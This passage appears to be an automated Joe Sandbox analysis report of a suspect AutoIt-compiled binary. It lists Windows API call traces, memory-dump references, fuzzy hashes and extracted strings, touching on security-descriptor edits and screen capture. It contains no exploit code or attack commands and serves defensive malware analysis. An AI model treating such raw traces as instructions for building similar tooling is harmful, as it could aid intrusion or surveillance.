                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                        • String ID: %s%u
                                                                                                                                        • API String ID: 3119225716-679674701
                                                                                                                                        • Opcode ID: ed203bb06926559e348e5a9a585c419d1a8949579e1011873eeb1374bcffcf4c
                                                                                                                                        • Instruction ID: 7b8e0c20ed319e9ef8c9dbedb85eccd35345d1a305f3e609b7013c31a9a70dd6
                                                                                                                                        • Opcode Fuzzy Hash: ed203bb06926559e348e5a9a585c419d1a8949579e1011873eeb1374bcffcf4c
                                                                                                                                        • Instruction Fuzzy Hash: 2BA1E331204306EFDF24DF64D888BAAB7A8FF44350F108519F9AAD6191DB38ED45CB91
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0079E6E1
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E6F2
                                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0079E71A
                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0079E737
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E755
                                                                                                                                        • _wcsstr.LIBCMT ref: 0079E766
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0079E79E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E7AE
                                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0079E7D5
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0079E81E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E82E
                                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0079E856
                                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 0079E8BF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                                        • Opcode ID: b513b48af3519b0696a467b9a7941116c93b9b61cda3f7288d1b370bc57afafd
                                                                                                                                        • Instruction ID: e6340303bcf09600d867333fb6573747843fc1a9e8735ec83914292d03711cc8
                                                                                                                                        • Opcode Fuzzy Hash: b513b48af3519b0696a467b9a7941116c93b9b61cda3f7288d1b370bc57afafd
                                                                                                                                        • Instruction Fuzzy Hash: 4A81A131008245DBDF15DF50E885FAA7BE8FF44764F04846AFD859A092DB38ED46CBA2
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                                        • Opcode ID: 4ac5be907f9438d4e2e57df716b95c86b403e3bc3eb145a1a44aba211e9b6246
                                                                                                                                        • Instruction ID: dea7ccbbe90ac3a9b4f810de89b000f3dc5ac1006bb03266925f832f1d23f70d
                                                                                                                                        • Opcode Fuzzy Hash: 4ac5be907f9438d4e2e57df716b95c86b403e3bc3eb145a1a44aba211e9b6246
                                                                                                                                        • Instruction Fuzzy Hash: DC31E031A44205EADB28FB20ED07EEE73A8AF10754F200424FA52B11D2FF5D6F64C6A1
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 0079F8AB
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0079F8BD
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0079F8D4
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0079F8E9
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0079F8EF
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0079F8FF
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0079F905
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0079F926
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0079F940
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079F949
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0079F9B4
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0079F9BA
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0079F9C1
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0079FA0D
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0079FA1A
                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0079FA3F
                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0079FA6A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                        • Opcode ID: c74489024bd2cdcbc6cf58ce93acd15417a8d6006e0e4265f8e65ae06b1033f4
                                                                                                                                        • Instruction ID: 70f65b03342302722891516c6d53fd172a5ea2732d50a1d149f79ac98be2c326
                                                                                                                                        • Opcode Fuzzy Hash: c74489024bd2cdcbc6cf58ce93acd15417a8d6006e0e4265f8e65ae06b1033f4
                                                                                                                                        • Instruction Fuzzy Hash: 59514A70900709AFDB209FA8DD89FAEBBB5FF08704F004928E596E65A0C778AD54CB10
                                                                                                                                        APIs
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B026A
                                                                                                                                        • _wcschr.LIBCMT ref: 007B0278
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B028F
                                                                                                                                        • _wcscat.LIBCMT ref: 007B029E
                                                                                                                                        • _wcscat.LIBCMT ref: 007B02BC
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B02DD
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007B03BA
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B03DF
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B03F1
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B0406
                                                                                                                                        • _wcscat.LIBCMT ref: 007B041B
                                                                                                                                        • _wcscat.LIBCMT ref: 007B042D
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0442
                                                                                                                                          • Part of subcall function 007AC890: _wcscmp.LIBCMT ref: 007AC92A
                                                                                                                                          • Part of subcall function 007AC890: __wsplitpath.LIBCMT ref: 007AC96F
                                                                                                                                          • Part of subcall function 007AC890: _wcscpy.LIBCMT ref: 007AC982
                                                                                                                                          • Part of subcall function 007AC890: _wcscat.LIBCMT ref: 007AC995
                                                                                                                                          • Part of subcall function 007AC890: __wsplitpath.LIBCMT ref: 007AC9BA
                                                                                                                                          • Part of subcall function 007AC890: _wcscat.LIBCMT ref: 007AC9D0
                                                                                                                                          • Part of subcall function 007AC890: _wcscat.LIBCMT ref: 007AC9E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                                        • Opcode ID: d03b1a8ee4e9185687bc4ce605680055b45e82a877f58770d2abc38d6ace42ba
                                                                                                                                        • Instruction ID: a0c86fc2630199c2a65f371f0e273df33ea972355986ecf57f3662b80e5e47b4
                                                                                                                                        • Opcode Fuzzy Hash: d03b1a8ee4e9185687bc4ce605680055b45e82a877f58770d2abc38d6ace42ba
                                                                                                                                        • Instruction Fuzzy Hash: 9B91AD71504745EFCB24EB54C859FDBB3E8AF84310F04495DF9499B292EB38EA48CB92
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007CCD0B
                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 007CCD83
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007CCE04
                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007CCE26
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CCE35
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007CCE52
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00760000,00000000), ref: 007CCE85
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CCEA4
                                                                                                                                        • GetDesktopWindow.USER32 ref: 007CCEB9
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 007CCEC0
                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007CCED2
                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007CCEEA
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 007AB46D
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 007AB476
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007AB482
                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007AB561
                                                                                                                                        • __swprintf.LIBCMT ref: 007AB591
                                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 007AB5BD
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007AB63F
                                                                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 007AB6D1
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007AB727
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007AB736
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 007AB772
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 007C6FF9
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C7044
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007CE3BB
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007CBCBF), ref: 007CE417
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE457
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE49C
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE4D3
                                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,007CBCBF), ref: 007CE4DF
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007CE4EF
                                                                                                                                        • DestroyCursor.USER32(?), ref: 007CE4FE
                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007CE51B
                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007CE527
                                                                                                                                          • Part of subcall function 00781BC7: __wcsicmp_l.LIBCMT ref: 00781C50
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                        • API String ID: 3907162815-1154884017
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 007B0EFF
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007B0F0F
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007B0F1B
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007B0F79
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0F91
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0FA3
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007B0FB8
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0FCC
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0FFE
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B101F
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B102B
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007B106A
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 007ADB26
                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 007ADB73
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007ADBBB
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007ADBF2
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007ADC20
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007D4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 007A3145
                                                                                                                                        • LoadStringW.USER32(00000000,?,007D4085,00000016), ref: 007A314E
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,007D4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 007A3170
                                                                                                                                        • LoadStringW.USER32(00000000,?,007D4085,00000016), ref: 007A3173
                                                                                                                                        • __swprintf.LIBCMT ref: 007A31B3
                                                                                                                                        • __swprintf.LIBCMT ref: 007A31C5
                                                                                                                                        • _wprintf.LIBCMT ref: 007A326C
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A3283
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 007AD96C
                                                                                                                                        • __swprintf.LIBCMT ref: 007AD98E
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007AD9CB
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007AD9F0
                                                                                                                                        • _memset.LIBCMT ref: 007ADA0F
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007ADA4B
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 007ADA80
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007ADA8B
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 007ADA94
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007ADA9E
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007CBD04,?,?), ref: 007CE564
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE57B
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE586
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE593
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007CE59C
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE5AB
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007CE5B4
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE5BB
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007CE5CC
                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,007ED9BC,?), ref: 007CE5E5
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007CE5F5
                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 007CE619
                                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007CE644
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007CE66C
                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007CE682
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007B0C93
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0CAB
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0CBD
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007B0CD2
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0CE6
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 007B0CFE
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 007B0D18
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0D2A
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                        • String ID: *.*
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079B903
                                                                                                                                          • Part of subcall function 0079B8E7: GetLastError.KERNEL32(?,0079B3CB,?,?,?), ref: 0079B90D
                                                                                                                                          • Part of subcall function 0079B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0079B3CB,?,?,?), ref: 0079B91C
                                                                                                                                          • Part of subcall function 0079B8E7: RtlAllocateHeap.NTDLL(00000000,?,0079B3CB), ref: 0079B923
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079B93A
                                                                                                                                          • Part of subcall function 0079B982: GetProcessHeap.KERNEL32(00000008,0079B3E1,00000000,00000000,?,0079B3E1,?), ref: 0079B98E
                                                                                                                                          • Part of subcall function 0079B982: RtlAllocateHeap.NTDLL(00000000,?,0079B3E1), ref: 0079B995
                                                                                                                                          • Part of subcall function 0079B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0079B3E1,?), ref: 0079B9A6
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079B5F7
                                                                                                                                        • _memset.LIBCMT ref: 0079B60C
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079B62B
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B63C
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0079B679
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0079B695
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B6B2
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0079B6C1
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0079B6C8
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079B6E9
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 0079B6F0
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079B721
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0079B747
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079B75B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                        • Opcode ID: e4174de9662ea4566de0262d958e7d5116ae692cda24285384ac3ee28dab1673
                                                                                                                                        • Instruction ID: d3050909dd6332cee992bf19d89f662e809e407c2c32a18b6423ebe9d87ffeb3
                                                                                                                                        • Opcode Fuzzy Hash: e4174de9662ea4566de0262d958e7d5116ae692cda24285384ac3ee28dab1673
                                                                                                                                        • Instruction Fuzzy Hash: 11516C71900249FFDF109FA4ED85EEEBB79FF48314F04815AE915AA290DB399A05CB60
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 007BA2DD
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007BA2E9
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 007BA2F5
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 007BA302
                                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007BA356
                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 007BA392
                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007BA3B6
                                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 007BA3BE
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007BA3C7
                                                                                                                                        • DeleteDC.GDI32(00000006), ref: 007BA3CE
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 007BA3D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                        • String ID: (
                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                        • Opcode ID: 63aaac35047d9ab95251ae008b793d55fb2b5a7599ab4168d604d9e3cadcb372
                                                                                                                                        • Instruction ID: b32e7e49c8fe171320b4dfb7e0ef29e40fea70622ed6a31c3c707e1379dc119d
                                                                                                                                        • Opcode Fuzzy Hash: 63aaac35047d9ab95251ae008b793d55fb2b5a7599ab4168d604d9e3cadcb372
                                                                                                                                        • Instruction Fuzzy Hash: F1513875900349EFDB25DFA8C888EAEBBB9EF48310F14841DF95A9B210C739AD418B54
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 007AD567
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 007AD589
                                                                                                                                        • __swprintf.LIBCMT ref: 007AD5DC
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD68D
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD6AB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
